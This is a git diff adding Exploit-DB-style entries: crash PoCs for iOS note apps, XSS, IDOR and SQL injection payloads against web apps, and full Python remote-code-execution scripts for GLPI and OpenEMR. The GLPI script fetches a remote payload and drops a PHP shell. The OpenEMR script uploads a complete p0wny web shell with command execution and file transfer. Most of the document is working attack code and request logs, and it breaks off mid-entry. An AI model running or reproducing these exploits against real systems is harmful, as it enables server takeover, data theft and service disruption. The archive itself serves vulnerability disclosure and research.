diff --git a/exploits/ios/dos/50001.py b/exploits/ios/dos/50001.py new file mode 100755 index 000000000..b1af08921 --- /dev/null +++ b/exploits/ios/dos/50001.py @@ -0,0 +1,35 @@ +# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) +# Date: 06-14-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888 +# Version: 3.0.3 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/50002.py b/exploits/ios/dos/50002.py new file mode 100755 index 000000000..16d88e024 --- /dev/null +++ b/exploits/ios/dos/50002.py @@ -0,0 +1,37 @@ +# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC) +# Date: 06-14-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/es/app/post-it/id920127738 +# Version: 5.0.1 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Post-it is vulnerable to a DoS condition when a long list of characters is +being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new +payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: +f = open("payload.txt","w") +f.write(buffer) +f.close() +print ("File created") +except: +print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/50003.py b/exploits/ios/dos/50003.py new file mode 100755 index 000000000..4992488ab --- /dev/null +++ b/exploits/ios/dos/50003.py @@ -0,0 +1,36 @@ +# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC) +# Date: 06-14-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217 +# Version: 6.4 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Notex – the best notes is vulnerable to a DoS condition when a long list of +characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: +f = open("payload.txt","w") +f.write(buffer) +f.close() +print ("File created") +except: +print ("File cannot be created") \ No newline at end of file diff --git a/exploits/multiple/webapps/49571.py b/exploits/multiple/webapps/49571.py index 13ef0f1b9..1e8eb13b0 100755 --- a/exploits/multiple/webapps/49571.py +++ b/exploits/multiple/webapps/49571.py @@ -1,7 +1,7 @@ # Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated) # Date: 17 Feb 2020 # Exploit Author: Podalirius -# PoC demonstration article: https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/ +# PoC demonstration article: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/ # Vendor Homepage: https://gitea.io/ # Software Link: https://dl.gitea.io/ # Version: >= 1.1.0 to <= 1.12.5 diff --git a/exploits/multiple/webapps/49981.txt b/exploits/multiple/webapps/49981.txt index 5424be18b..e50e9ad43 100644 --- a/exploits/multiple/webapps/49981.txt +++ b/exploits/multiple/webapps/49981.txt @@ -5,6 +5,7 @@ # Software Link: https://www.cerberusftp.com/download/ # Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier # Tested on: windows server 2016 +# CVE: CVE-2019-25046 ------------ About Cerberus FTP Server (From Vendor Site) : diff --git a/exploits/multiple/webapps/49990.txt b/exploits/multiple/webapps/49990.txt new file mode 100644 index 000000000..9d51cf339 --- /dev/null +++ b/exploits/multiple/webapps/49990.txt @@ -0,0 +1,74 @@ +# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS) +# Software Link: https://www.accela.com/civic-platform/ +# Version: <= 21.1 +# Author: Abdulazeez Alaseeri +# Tested on: JBoss server/windows +# Type: Web App +# Date: 07/06/2021 +# CVE-2021-34370 + + + +================================================================ +Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 +================================================================ + + +================================================================ +Request Heeaders start +================================================================ + +GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1 + +Host: Hidden + +Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Upgrade-Insecure-Requests: 1 + +Te: trailers + +Connection: close + +================================================================ +Request Heeaders end +================================================================ + + + +================================================================ +Response Heeaders start +================================================================ +HTTP/1.1 200 OK + +Connection: close + +Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter + +X-XSS-Protection: 0 + +Content-Type: text/html;charset=ISO-8859-1 + +Content-Length: 73 + +Date: Tue, 08 Jun 2021 10:41:59 GMT + + + + + +================================================================ +Response Heeaders end +================================================================ + +Payload: %27^alert`1`^%27 + +for open redirect, replace the payload to a valid website. \ No newline at end of file diff --git a/exploits/multiple/webapps/49991.txt b/exploits/multiple/webapps/49991.txt new file mode 100644 index 000000000..5a18c8882 --- /dev/null +++ b/exploits/multiple/webapps/49991.txt @@ -0,0 +1,82 @@ +# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR) +# Software Link: https://www.accela.com/civic-platform/ +# Version: <= 21.1 +# Author: Abdulazeez Alaseeri +# Tested on: JBoss server/windows +# Type: Web App +# Date: 07/06/2021 +# CVE: CVE-2021-34369 + + +================================================================ +Accela Civic Platform Insecure Direct Object References <= 21.1 +================================================================ + +This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber +================================================================ +Request Heeaders start +================================================================ + +GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1 + +Host: Hidden + +Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Upgrade-Insecure-Requests: 1 + +Te: trailers + +Connection: close + +================================================================ +Request Heeaders end +================================================================ + + + +================================================================ +Response Heeaders start +================================================================ +HTTP/1.1 200 OK + +Expires: Thu, 01 Jan 1970 00:00:01 GMT + +Cache-Control: no-cache + +X-Powered-By: JSP/2.3 + +Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure + +Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure + +Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure + +Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure + +X-XSS-Protection: 0 + +Pragma: No-cache + +X-UA-Compatible: IE=EDGE + +Date: Wed, 09 Jun 2021 04:09:40 GMT + +Connection: close + +Content-Type: text/html;charset=UTF-8 + +Content-Length: 98126 +================================================================ +Response Heeaders end +================================================================ + +contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR \ No newline at end of file diff --git a/exploits/php/webapps/49992.py b/exploits/php/webapps/49992.py new file mode 100755 index 000000000..600414607 --- /dev/null +++ b/exploits/php/webapps/49992.py @@ -0,0 +1,241 @@ +# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE) +# Exploit Author: Brian Peters +# Vendor Homepage: https://glpi-project.org +# Software Link: https://github.com/glpi-project/glpi/releases +# Version: < 9.4.6 +# CVE: CVE-2020-11060 + +# Download a SQL dump and find the table offset for "wifinetworks" with +# cat | grep "CREATE TABLE" | grep -n wifinetworks +# Update the offsettable value with this number in the create_dump function +# The Nix/Win paths are based on defaults. You can use curl -I and use md5sum to find the path based +# on the Set-Cookie hash. + +#!/usr/bin/python + +import argparse +import json +import random +import re +import requests +import string +import sys +import time +from datetime import datetime +from lxml import html + +class GlpiBrowser: + + def __init__(self, url, user, password, platform): + self.url = url + self.user = user + self.password = password + self.platform = platform + + self.session = requests.Session() + self.session.verify = False + requests.packages.urllib3.disable_warnings() + + def extract_csrf(self, html): + return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0] + + def get_login_data(self): + r = self.session.get('{0}'.format(self.url), allow_redirects=True) + + csrf_token = self.extract_csrf(r.text) + name_field = re.findall('name="(.*)" id="login_name"', r.text)[0] + pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0] + + return name_field, pass_field, csrf_token + + def login(self): + try: + name_field, pass_field, csrf_token = self.get_login_data() + except Exception as e: + print "[-] Login error: could not retrieve form data" + sys.exit(1) + + data = { + name_field: self.user, + pass_field: self.password, + "auth": "local", + "submit": "Post", + "_glpi_csrf_token": csrf_token + } + + r = self.session.post('{}/front/login.php'.format(self.url), data=data, allow_redirects=False) + + return r.status_code == 302 + + def wipe_networks(self, padding, datemod): + r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') + comment = r.content + + r = self.session.get('{0}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9'.format(self.url)) + try: + csrf_token = self.extract_csrf(r.text) + except Exception as e: + print "[-] Edit network error: could not retrieve form data" + sys.exit(1) + + webpage = html.fromstring(r.content) + links = webpage.xpath('//a/@href') + for rawlink in links: + if "wifinetwork.form.php?id=" in rawlink: + rawlinkparts = rawlink.split("=") + networkid = rawlinkparts[-1] + print "Deleting network "+networkid + + data = { + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": comment, + "essid": "RCE"+padding, + "mode": "ad-hoc", + "purge": "Delete permanently", + "id": networkid, + "_glpi_csrf_token": csrf_token, + '_read_date_mod': datemod + } + + r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data) + + def create_network(self, datemod): + r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') + comment = r.content + + r = self.session.get('{0}/front/wifinetwork.php'.format(self.url)) + try: + csrf_token = self.extract_csrf(r.text) + except Exception as e: + print "[-] Create network error: could not retrieve form data" + sys.exit(1) + + data = { + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": comment, + "essid": "RCE", + "mode": "ad-hoc", + "add": "ADD", + "_glpi_csrf_token": csrf_token, + '_read_date_mod': datemod + } + + r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data) + print "[+] Network created" + print " Name: PoC" + print " ESSID: RCE" + + def edit_network(self, padding, datemod): + r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') + comment = r.content + #create the padding for the name and essid + + + r = self.session.get('{0}/front/wifinetwork.php'.format(self.url)) + webpage = html.fromstring(r.content) + links = webpage.xpath('//a/@href') + for rawlink in links: + if "wifinetwork.form.php?id=" in rawlink: + rawlinkparts = rawlink.split('/') + link = rawlinkparts[-1] + + #edit the network name and essid + r = self.session.get('{0}/front/{1}'.format(self.url, link)) + try: + csrf_token = self.extract_csrf(r.text) + except Exception as e: + print "[-] Edit network error: could not retrieve form data" + sys.exit(1) + + rawlinkparts = rawlink.split("=") + networkid = rawlinkparts[-1] + + data = { + "entities_id": "0", + "is_recursive": "0", + "name": "PoC", + "comment": comment, + "essid": "RCE"+padding, + "mode": "ad-hoc", + "update": "Save", + "id": networkid, + "_glpi_csrf_token": csrf_token, + "_read_date_mod": datemod + } + r = self.session.post('{0}/front/wifinetwork.form.php'.format(self.url), data=data) + print "[+] Network mofified" + print " New ESSID: RCE"+padding + + def create_dump(self, shellname): + path='' + if self.platform == "Win": + path="C:\\xampp\\htdocs\\pics\\" + elif self.platform == "Nix": + path="/var/www/html/glpi/pics/" + + #adjust offset number to match the table number for wifi_networks + #this can be found by downloading a SQL dump and running cat | grep "CREATE TABLE" | grep -n "wifinetworks" + r = self.session.get('{0}/front/backup.php?dump=dump&offsettable=312&fichier={1}{2}'.format(self.url, path, shellname)) + + print '[+] Shell: {0}/pics/{1}'.format(self.url, shellname) + + def shell_check(self, shellname): + r = self.session.get('{0}/pics/{1}?0=echo%20asdfasdfasdf'.format(self.url, shellname)) + print " Shell size: "+str(len(r.content)) + if "asdfasdfasdf" in r.content: + print "[+] RCE FOUND!" + sys.exit(1) + return len(r.content) + + def pwn(self): + if not self.login(): + print "[-] Login error" + return + else: + print "[+] Logged in" + + #create timestamp + now = datetime.now() + datemod = now.strftime("%Y-%m-%d %H:%M:%S") + + #create comment payload + + tick=1 + while True: + #create random shell name + letters = string.ascii_letters + shellname = ''.join(random.choice(letters) for i in range(8))+".php" + + #create padding for ESSID + padding = '' + for i in range(1,int(tick)+1): + padding+=str(i) + + self.wipe_networks(padding, datemod) + self.create_network(datemod) + self.edit_network(padding, datemod) + self.create_dump(shellname) + self.shell_check(shellname) + print "\n" + raw_input("Press any key to continue with the next iteration...") + tick+=1 + + return + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + parser.add_argument("--url", help="Target URL", required=True) + parser.add_argument("--user", help="Username", required=True) + parser.add_argument("--password", help="Password", required=True) + parser.add_argument("--platform", help="Win/Nix", required=True) + + args = parser.parse_args() + + g = GlpiBrowser(args.url, user=args.user, password=args.password, platform=args.platform) + + g.pwn() \ No newline at end of file diff --git a/exploits/php/webapps/49993.txt b/exploits/php/webapps/49993.txt new file mode 100644 index 000000000..6d7852f10 --- /dev/null +++ b/exploits/php/webapps/49993.txt @@ -0,0 +1,24 @@ +# Exploit Title: COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS) +# Date: 11/06/2021 +# Exploit Author: BHAVESH KAUL +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Server: XAMPP + +# Description # + +COVID19 Testing Management System 1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. Anyone can submit a stored XSS payload without login when registering as a new user. This makes the application store our payload in the database and it is fired everything the dashboard is viewed. + +# Proof of Concept (PoC) : Exploit # + +1) Goto: http://localhost/covid-tms/new-user-testing.php +2) Enter the following payload in 'State' parameter: +3) Fill out other information and submit query +4) Now goto: http://localhost/covid-tms/live-test-updates.php +5) Stored XSS payload is fired + +# Image PoC : Reference Image # + +1) Vulnerable Parameter: https://ibb.co/1vyNM2w +2) Payload Fired: https://ibb.co/CsfPnXK \ No newline at end of file diff --git a/exploits/php/webapps/49994.txt b/exploits/php/webapps/49994.txt new file mode 100644 index 000000000..646052407 --- /dev/null +++ b/exploits/php/webapps/49994.txt @@ -0,0 +1,52 @@ +# Exploit Title: Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated) +# Date: 11/06/2021 +# Exploit Author: Riadh Benlamine (rbn0x00) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip +# Version: 1.0 +# Category: Webapps +# Tested on: Apache2+MariaDB latest version +# Description : Stock Management System suffers from SQL injection in '/stock/php_action/changePassword.php' because it does not sanitize the input before pushing into the sql query. Leading to remote code execution. + +- Vulnerable parameter: user_id= +SQLmap command: +-------------- + +sqlmap -u http:///stock/php_action/changePassword.php --data="password=invalidpassword&npassword=test&cpassword=test&user_id=1*" --cookie="PHPSESSID=" --is-dba + +SQLmap Output: +------------- + +Parameter: #1* ((custom) POST) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=(SELECT (CASE WHEN (7792=7792) THEN 1 ELSE (SELECT 5315 UNION SELECT 6564) END)) + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=1 AND (SELECT 8344 FROM (SELECT(SLEEP(5)))RdSH) + +Trick: +----- +We could steal the users cookie by chaining CSRF and stored XSS + + + + + + +
+ + " /> + + + + + +
+ + + + + +and then use the cookie to preform SQL injection :) \ No newline at end of file diff --git a/exploits/php/webapps/49995.txt b/exploits/php/webapps/49995.txt new file mode 100644 index 000000000..8e99ad281 --- /dev/null +++ b/exploits/php/webapps/49995.txt @@ -0,0 +1,19 @@ +# Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection +# Date: 12/06/2021 +# Exploit Author: BHAVESH KAUL +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/small-crm-php/ +# Version: 3.0 +# Tested on: Server: XAMPP + +# Description # + +Small CRM 3.0 is vulnerable to SQL Injection on it's admin login because of insufficient user supplied data sanitization and the sql injection payload being executed. Attacker is able to access the admin login panel and supply the malicious payload, successfully taking over admin account. + +# Proof of Concept (PoC) : Exploit # + +1) Goto: http://localhost/crm/admin/ + +2) Enter the following payload in 'Username' and 'Password' parameter: ' OR 'x'='x + +3) SQL Injection successfull \ No newline at end of file diff --git a/exploits/php/webapps/49996.txt b/exploits/php/webapps/49996.txt new file mode 100644 index 000000000..c3df450ac --- /dev/null +++ b/exploits/php/webapps/49996.txt @@ -0,0 +1,43 @@ +# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) +# Date : 2021/09/06 +# Exploit Author : Mert Daş merterpreter@gmail.com +# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip +# Software web : https://textpattern.com/ +# Tested on: Server : Xampp + +First of all we should use file upload section to upload our shell. +Our shell contains this malicious code: + +1) Go to content section . +2) Click Files and upload malicious php file. +3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode; + +After upload our file , our request and respons is like below : + +Request: + +GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) +Gecko/20100101 Firefox/89.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP; +PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi +Upgrade-Insecure-Requests: 1 + + +Response: + +HTTP/1.1 200 OK +Date: Thu, 10 Jun 2021 00:32:41 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 +X-Powered-By: PHP/7.4.20 +Content-Length: 22 +Connection: close +Content-Type: text/html; charset=UTF-8 + +pc\mertdas \ No newline at end of file diff --git a/exploits/php/webapps/49998.py b/exploits/php/webapps/49998.py new file mode 100755 index 000000000..6bc9ae1e4 --- /dev/null +++ b/exploits/php/webapps/49998.py @@ -0,0 +1,133 @@ +# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) +# Date 12.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip +# Version: Prior to 5.0.1.4 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-15139 +# CWE: CWE-434 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139 + +''' +Description: +Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote +authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload +form and accessing it in the images directory. +''' + + +''' +Banner: +''' +banner =""" + ___ _____ __ __ ____ ____ ___ _ _____ + / _ \ _ __ ___ _ __ | ____| \/ | _ \ | ___| / _ \ / | |___ / + | | | | '_ \ / _ \ '_ \| _| | |\/| | |_) | _____ |___ \| | | || | |_ \ + | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | + \___/| .__/ \___|_| |_|_____|_| |_|_| \_\ |____(_)___(_)_(_)____/ + |_| + + _____ _ _ _ + | ____|_ ___ __ | | ___ (_) |_ + | _| \ \/ / '_ \| |/ _ \| | __| + | |___ > <| |_) | | (_) | | |_ + |_____/_/\_\ .__/|_|\___/|_|\__| + |_| + +""" +print(banner) + + +''' +Import required modules +''' +import argparse +import requests + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +openemr_path = args.PATH +username = args.USERNAME +password = args.PASSWORD + +''' +Authentication: +''' +# Preparation: +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' +auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' +response = session.get(auth_chek_url) + +# Header (auth): +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Referer': auth_chek_url, + 'Upgrade-Insecure-Requests': '1', +} + +# Body (auth): +body = { + 'new_login_session_management': '1', + 'authProvider': 'Default', + 'authUser': username, + 'clearPass': password, + 'languageChoice': '1' +} + +# Authentication: +print('') +print('[+] Authentication') +auth = session.post(auth_url,headers=header, data=body) + + +''' +Exploit: +''' +print('') +print('[+] Uploading Webshell:') + +# URL: +exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php' + +# Headers (Exploit): +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------31900464228840324774249185339", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php', + "Upgrade-Insecure-Requests": "1" +} + +# Body (Exploit): +body = "-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filedata\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n12000000\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_image\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n 
\n                
\n        ___                         ____      _          _ _        _  _   \n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  \n|_|                         |___/  \\____/                                  \n                
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_dest_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_education\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"bn_save\"\r\n\r\nSave\r\n-----------------------------31900464228840324774249185339--\r\n" + +# Send Exploit: +session.post(exploit_url, headers=header, data=body) + +# Finish +path = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php' +print('[+] Webshell: ' + path) \ No newline at end of file diff --git a/exploits/windows/local/49997.txt b/exploits/windows/local/49997.txt new file mode 100644 index 000000000..4cf1fc37d --- /dev/null +++ b/exploits/windows/local/49997.txt @@ -0,0 +1,48 @@ +# Exploit Title: Spy Emergency 25.0.650 - Unquoted Service Path +# Discovery by: Erick Galindo +# Discovery Date: 2021-06-11 +# Vendor Homepage: https://www.spy-emergency.com/ +# Software Link: https://www.spy-emergency.com/download/download.php?id=1 +# Tested Version: 25.0.650.0 +# Vulnerability Type: 